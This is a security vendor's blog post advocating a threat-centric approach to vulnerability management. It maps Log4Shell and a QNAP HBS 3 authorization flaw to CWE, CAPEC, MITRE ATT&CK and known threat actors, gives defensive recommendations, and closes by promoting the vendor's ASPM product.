If there’s one thing we’ve learned over the years in cybersecurity, it’s that vulnerabilities have a nasty habit of reappearing in different forms. To handle those vulnerabilities effectively, I’m introducing here a threat-centric approach to vulnerability leveraging Phoenix Security ASPM Threat intelligence for Vulnerability Management. Some days, it’s like playing whack-a-mole with the Common Vulnerabilities and Exposures (CVE) database—except the moles can ransom your entire network. This blog explores how focusing on threat categories rather than singular vulnerabilities can help reduce exhaustion (and maybe your coffee consumption) while strengthening your security posture for your Application Security and Unified Vulnerability Management Program.
We’ll review how CVE, CWE, CAPEC, and MITRE ATT&CK relate. Then, we’ll examine two prime examples—CVE-2021-44228 (the infamous Log4Shell) and CVE-2021-28799 (the QNAP HBS 3 vulnerability)—to illustrate how a threat-centric approach can pay dividends in the long run.
Check Out the full video: https://youtu.be/kMM6vTRVd9s
To see all the analysis used here:
Part 1: Understanding the Mapping – CVE, CWE, CAPEC, and MITRE
For access to the centric analyzer https://threat-centric.phoenix.security
In the vulnerability world, acronyms are almost as common as phishing emails. Here’s a quick breakdown:
1. CVE (Common Vulnerabilities and Exposures)
• A CVE is a standardized identifier for a specific vulnerability.
• Example: CVE-2021-44228 for Log4j’s remote code execution flaw.
2. CWE (Common Weakness Enumeration)
• CWE describes the underlying software weakness that leads to the vulnerability.
• For CVE-2021-44228, multiple CWEs apply, such as Improper Access Control or Improper Input Validation.
3. CAPEC (Common Attack Pattern Enumeration and Classification)
• CAPEC focuses on the attacker’s perspective: how they might exploit the weakness.
• For instance, CAPEC references attack patterns like Injection, Exploitation of Remote Code Execution, and Bypass Techniques.
4. MITRE ATT&CK
• A framework describing how adversaries move through the kill chain—covering Tactics, Techniques, and Procedures (TTPs).
• In the case of Log4Shell, numerous APT group campaigns highlight Defense Evasion, Privilege Escalation, and Persistence.
Aligning a CVE to its corresponding CWE, CAPEC patterns, and MITRE techniques gives a holistic view of the problem, how attackers exploit it, and where it fits in the overall attack kill chain. This helps shape more effective, layered defenses. This is important if you want to leverage threat intelligence for vulnerability management beyond purely mapping it to just CVE. However, it is also important to leverage this mapping to infer which threat actor could potentially leverage a vulnerability.
The next evolution of your vulnerability management program involves treating threats as central parts of vulnerability analysis and evolving application security programs.
Part 2: The Problem with One-Off Patch Management
Let’s face it: organizations often scramble when a critical CVE pops up. Everyone goes on high alert, coffee machines go into overdrive, and scanners churn out massive reports. Then, after the patch-a-thon, everyone breathes a sigh of relief—until the following significant vulnerability emerges.
Exhaustion and the Never-Ending Game of Patch-and-Pray
• Time-Consuming: Security teams spend a disproportionate time firefighting each major CVE.
• Resource-Draining: Constant emergency patching distracts from more significant initiatives like strategic improvements or advanced monitoring.
• Inefficient: Focusing on one CVE at a time may blind you to the broader category of unaddressed weaknesses.
Enter the threat-centric approach. Instead of chasing your tail each time a new vulnerability surfaces, you identify and tackle the categories of weaknesses—like Remote Code Execution or Improper Authorization—that attackers repeatedly exploit for both your Application Security and Unified Vulnerability Management Program.
Get in control of your Application Security posture and Vulnerability management
Part 3: Two Real-World Examples of vulnerabilities used in ransomware
Using a threat-centric approach to analyze CVE-2021-44228 (Log4J)
3.1 CVE-2021-44228 (Log4J)
Using our LLM Analyzer, we get the following
[VENDOR] Apache
[PRODUCT] Log4j2
[COMPONENT] 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1)
[VERSION]
[WEAKNESS] Improper access control
[ATTACKER] attacker
[IMPACT] execute arbitrary code
[VECTOR] control log messages or log message parameters
[ROOTCAUSE] Unprotected JNDI features
[VULNERABILITY TYPE] Improper access control
[VULNERABILITY IMPACT] Code execution
What you could communicate using the threat analysis above
• Vendor/Product: Apache Log4j2
• Weakness (CWE): Improper Access Control, among others
• Impact: Remote Code Execution (RCE)
• Root Cause: Unprotected JNDI features that allow attackers to load malicious code from LDAP servers
• Affected Versions: 2.0-beta9 through 2.15.0 (excluding certain security releases)
Why It’s So Dangerous
Log4Shell lets attackers execute arbitrary code if they can control log messages. This vulnerability became a favorite among ransomware operators. According to some data from Phoenix Security threat intel on ransomware, Log4Shell has been identified in multiple attack campaigns aiming to:
• Inject malicious payloads
• Escalate privileges
• Persist on the victim’s network (while evading defenses)
These patterns align with the MITRE ATT&CK categories for Defense Evasion, Persistence, and Privilege Escalation. In other words, once the attacker gets a foothold, they can roam freely—and possibly hold your data hostage faster than you can say “Java meltdown.”
What Threat Actors Are Using Log4j?
Various APT groups and cybercriminal organizations have leveraged the Log4Shell vulnerability for different motivations—ranging from espionage to financial gain. According to some of the threat mappings, groups like BlackOasis, APT37 (Reaper), Evilnum, CopyKittens, APT38, and Rocke have been tied to tactics that can include Log4j exploits or similar remote code execution techniques. Many ransomware gangs have also exploited this vulnerability to establish initial access, move laterally, and eventually encrypt valuable data.
• BlackOasis: Focuses on espionage, targeting media and think tanks.
• APT37 (Reaper, ScarCruft): Based in North Korea, motivated by information theft.
• Evilnum: Known for financial sector espionage.
• CopyKittens: Iranian-linked group focusing on government and IT sectors.
• APT38 (Bluenoroff): Known for financial crimes, often linked to the DPRK.
• Rocke: Chinese-based cybercriminal group motivated by financial gain.
In all these cases, Remote Code Execution is the golden ticket, enabling Defense Evasion, Privilege Escalation, and Persistence tactics per the MITRE ATT&CK framework.
Phoenix Security ASPM Threat Centric Approach – Threat Actors leveraging CVE-2021-44228 (Log4J) to deliver ransomware attacks
Takeaways based on this threat analysis using a threat-centric approach.
The recommendation you could make to a team based on this analysis is:
1. Patch Immediately: Update Log4j 2.16.0 (or later security releases).
2. Restrict JNDI: Even if you’ve patched, consider restricting or disabling JNDI lookups since they’re a standard route for exploitation.
3. Monitor for Suspicious Traffic: Watch network calls to unexpected LDAP or JNDI-related endpoints.
4. Remote code execution is one of the easiest methods to exploit vulnerability and the one more prolifically used in zero days and threat actors for ransomware
5. Since this is a highly targeted vulnerability with wide adoption and exploitation, it is key to scheduling a campaign and monitoring the remediation of this vulnerability at scale. Check the Phoenix Security feature vulnerability campaign
Also, you could leverage reachability analysis and visibility/business criticality in the narrative to augment what’s more exploitable and increase the likelihood of exploitation based on the reachability (network) and the reachability (library) at runtime. Check out the latest topics on reachability from our previous blog and the recent announcement on AI-based contextual runtime reachability.
QNAPP CVE-2021-28799 (QNAP HBS 3)
3.2 CVE-2021-28799 (QNAP HBS 3)
To analyze this vulnerability, we used the treat-centric LLM agent:
Using LLM we get the following:
[VENDOR] QNAP
[PRODUCT] HBS 3
[COMPONENT]
[VERSION] prior to v16.0.0415 on QTS 4.5.2, prior to v3.0.210412 on QTS 4.3.6, prior to v3.0.210411 on QTS 4.3.4, prior to v3.0.210411 on QTS 4.3.3, prior to v16.0.0419 on QuTS hero h4.5.1, prior to v16.0.0419 on QuTScloud c4.5.1~c4.5.4
[WEAKNESS] Improper authorization
[ATTACKER] Remote attackers
[IMPACT] Log in to a device
[VECTOR]
[ROOTCAUSE]
[VULNERABILITY TYPE] Improper authorization
[VULNERABILITY IMPACT] Unauthorized login
What you could communicate using the threat analysis above
• Vendor/Product: QNAP NAS devices running HBS 3 (Hybrid Backup Sync)
• Weakness (CWE): Improper Authorization
• Impact: Allows remote attackers to log in to the device without proper authorization
• Affected Versions: Multiple QTS and QuTS hero versions before specific patch releases
What Threat Actors Are Using QNAP CVE-2021-28799?
QNAP network storage solutions have attracted attention from a range of ransomware operators and opportunistic threat actors due to their popularity and the valuable data they often store. While not always tied to high-profile APT groups, QNAP devices have been targeted by:
1. eCh0raix (QNAPCrypt) Ransomware: Specializes in encrypting files on QNAP devices.
2. QSnatch Malware: Focuses on credential harvesting and establishing backdoors.
3. Multifaceted Ransomware Gangs: Various ransomware-as-a-service (RaaS) outfits may incorporate QNAP exploits or vulnerabilities like CVE-2021-28799 in their initial access chain.
These actors capitalize on Improper Authorization flaws to log in without proper credentials, then often escalate privileges or encrypt backups—an especially painful scenario if the QNAP is your primary backup target.
Why It Matters
Ransomware operators love a good unauthorized login. Once inside, they can:
• Exfiltrate sensitive data from the NAS before encrypting it.
• Move laterally within your network to compromise additional targets.
• Unauthorized logins and Remote code execution are very frequently used techniques in ransomware attacks and exploitation
• QNAP network storages are used by organizations to store backups, and threat actors are using this vulnerability both for exfiltration, prevention of ransomware backup restoration or simply data hijacking
Even though the root cause is different (i.e., “improper authorization” vs. “improper access control”), the outcome is strikingly similar: unauthorized remote control of systems. Once an attacker can log in, they essentially have the keys to the kingdom.
Takeaways
1. Enforce Strong Authentication: Beyond patching, make sure multi-factor authentication (MFA) is enabled where possible.
2. Segment Your Network: Don’t let one compromised NAS device lead to your entire environment being ransomed.
3. Regularly Audit Credentials: Attackers often reuse stolen credentials across multiple devices.
4. Consider the particular threat, threat actors leveraging those types of vulnerabilities and techniques used
5. Consider whether your system is reachable from a network perspective if you have to compensate control like WAF or network segmentation to increase or decrease the likelihood of those attacks
6. Since this is a highly targeted vulnerability with wide adoption and exploitation, it is key to scheduling a campaign and monitoring the remediation of this vulnerability at scale. Check the Phoenix Security feature vulnerability campaign
The information in this article is also available in greater detail in the eBook Building Resilient Application Security and Cloud Security Programs.
Download the eBook on ASPM Building Resilient Applications and Cloud Security Programs
Part 4: A Threat-Centric Approach to Vulnerability management and crossing ASPM boundaries
Now, you can take both these problems; they have common characteristics,
They are both Remote Code execution as classes and allow second-stage attacks
QNAP:
| Remote Code Execution and’Information Leak | Improper Authorization | |
Log4j :
| Remote Code Execution | Modify Configuration |
Instead of seeing Log4Shell and QNAP as isolated nightmares, view them as part of broader categories:
• Remote Code Execution (RCE): Tackle the root causes, such as injection flaws (SQL, LDAP, or JNDI) and inadequate input validation.
• Improper Authorization: Verify that your applications enforce strict role-based access and multi-factor authentication.
Looking at the pattern most frequently exploited in vulnerabilities used in ransomware, we can see those two patterns.
Also, analyzing zero days and ransomware attacks, you can see a strong resemblance of those vulnerabilities methods being used as root cause and technical impact over the years
Benefits of Category-Focused Strategies
1. Proactive Defense
By identifying recurring patterns—like RCE or authentication bypass—you can harden your systems before the following significant vulnerability appears.
2. Reduced False Sense of Security
Once you patch a single CVE, it’s tempting to say “We’re good!” But you remain vulnerable to the next variant if you haven’t addressed the underlying CWE (e.g., remote code execution, Memory corruption, improper input handling).
3. Efficient Use of Resources
Rather than chasing each new CVE, direct your patching and remediation efforts toward the classes of problems with the highest risk.
3. Threats Focus Campaigns
Rather than addressing each vulnerability, focusing on the threat that causes more harm, like remote code execution and buffer overflow or memory corruption, can help an organization be laser efficient in reducing future exposure to exploitation and easily leverage threat methods. Check the Phoenix Security feature vulnerability campaign
Part 5: Mapping It All Together
Below is a simplified illustration of how these two CVEs map to broader attack patterns. Notice the recurring themes:
1. CVE → CWE
• CVE-2021-44228 → Improper Access Control and Improper Input Validation (among others)
• CVE-2021-28799 → Improper Authorization
2. CWE → CAPEC
• Log4Shell: RCE via malicious JNDI injection (CAPEC references to injection and code execution techniques)
• QNAP HBS 3: Authentication bypass (CAPEC references for Bypass or Evasion patterns)
3. MITRE ATT&CK Techniques
• Log4Shell: Tactics such as Defense Evasion, Privilege Escalation, Persistence
• QNAP: Initial Access leading to further infiltration
4. Threat Actors
• Ransomware groups and APTs often reuse the same tactics (e.g., RCE) in different campaigns. By plugging the category-level holes, you reduce your attack surface across the board.
Part 6: Final Thoughts (and a Sip of Sanity)
A threat-centric approach may sound like another buzzword—and fair enough, cybersecurity does love its buzzwords. But if you look beyond the hype, you’ll see a methodology that reduces the constant whack-a-mole effect. By aligning your defenses with the recurring weaknesses (CWEs) and attack patterns (CAPEC, MITRE ATT&CK), you build resilience that doesn’t crumble the moment a new exploit hits Twitter.
However, combining this threat-centric approach makes it possible to infer future attacks: by leveraging those threats, we can identify in software or other vulnerabilities common characteristics (CWE, CAPEC) that will lead to threat actors leveraging those future vulnerability types to deliver zero days or ransomware attacks.
Those techniques can also be combined with reachability analysis (code), network reachability analysi,s and code-to-container reachability analysis to deliver a Unified approach to vulnerabilities from code to cloud
So before you roll out of bed at 3 a.m. to handle the next zero-day crisis—and you probably will—make sure you’re investing in eliminating entire classes of weaknesses. That way, your coffee supply might last a little longer. And who knows? Maybe you’ll get to enjoy a full night’s sleep before the next big vulnerability lands on the front page of every security news site.
Resources & Further Reading
1. Phoenix Security Threat Intel – For up-to-date data on ransomware TTPs and exploit prevalence.
- Exploit in the wild: https://phoenix.security/what-is-exploitability/
- OWASP/Appsec Vulnerability: https://phoenix.security/what-is-owasp-main/
- CWE/Appsec Vulnerabilities: https://phoenix.security/what-is-cwe-main/
2. MITRE ATT&CK – A wealth of information on adversarial behavior.
3. CVE Details – Keep an eye on the official CVE database for new disclosures.
4. Apache Log4j Security Page – For official patches and best practices on Log4Shell.
5. QNAP Security Advisories – For updates on QNAP product patches and vulnerabilities.
Stay safe, stay curious, and remember: categorizing your vulnerabilities is like categorizing your socks—if you don’t do it, you’ll always end up with a mismatched pair at the worst possible time.
To see all the analysis used here:
Minimize the vulnerability risk and act on the vulnerabilities that matter most, combining ASPM, EPSS, and reachability analysis.
Organizations often face an overwhelming volume of security alerts, including false positives and duplicate vulnerabilities, which can distract from real threats. Traditional tools may overwhelm engineers with lengthy, misaligned lists that fail to reflect business objectives or the risk tolerance of product owners.
Phoenix Security offers a transformative solution through its Actionable Application Security Posture Management (ASPM), powered by AI-based Contextual Quantitative analysis. This innovative approach correlates runtime data, combines it with EPSS and other threat intelligence, and applies the right risk to code and cloud, delivering a prioritized list of vulnerabilities.
Why do people talk about Phoenix Security ASPM?
• Automated Triage: Phoenix streamlines the triage process using a customizable 4D risk formula, ensuring critical vulnerabilities are addressed promptly by the right teams.
• Actionable Threat Intelligence: Phoenix provides real-time insights into vulnerabilities’ exploitability, leveraging EPS and combining runtime threat intelligence with application security data for precise risk mitigation.
• Contextual Deduplication with reachability analysis: Utilizing canary token-based traceability for network reachability and static and dynamic runtime reachability, Phoenix accurately deduplicates and tracks vulnerabilities within application code and deployment environments, allowing teams to concentrate on genuine threats.
By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains current and focuses on the key vulnerabilities.
